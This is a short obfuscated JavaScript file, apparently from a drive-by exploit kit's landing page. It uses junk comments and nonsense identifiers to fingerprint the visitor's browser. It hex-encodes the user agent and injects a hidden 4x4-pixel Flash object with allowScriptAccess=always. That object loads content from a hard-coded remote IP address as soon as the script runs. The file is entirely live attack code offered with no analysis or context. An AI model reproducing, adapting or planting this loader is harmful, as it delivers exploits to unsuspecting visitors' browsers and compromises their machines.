/*s62475d70388hssfj55786fs*/function hgfgerdfgdf(num, width){/*s59657d25169hfj36305fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s40142d10564hfj91297fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s65013d52878hfj5316fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s32712d32704hfj72952fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd57240hfs*/c += b + d;/*s97026d96979hfj91071fs*/e += 1;}return c;}/*s42921dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://185.159.131.146/?recognize&cars=3250&money=uzjkyAeAA3z4ZZA1MQ86H720XVnxSYgMOG-R2PaA9ArJKQRuM63Fvxz7QkdsMixhWC7FETi-9L&news=xXrQMvWYbRXQDp3EKv_cT6NAMVHRGECL2YudmrHVefjaflWkzrfFTF_wozKATwSG6_dtdfJUDQ&recognize=4726", ghnvbn("http://185.159.131.146/?ripped&cars=5000&money=pzo1UUl4Qoa39hkSEwBWfiJTXqBGNNw9H_5HBELUz2ln8yrRHcMh1lRKD72JUzO4tV18V6A4Smqr7S6SJrg&news=xHvQMrXYbRvFFYHfKPjEUKZEMUzWA0WKwY2ZhavVF52xFDLGpbf1Fx7spVidCFmEmvdvdLEHIwCh1UHASwB&impact=5571","gexywoaxor"));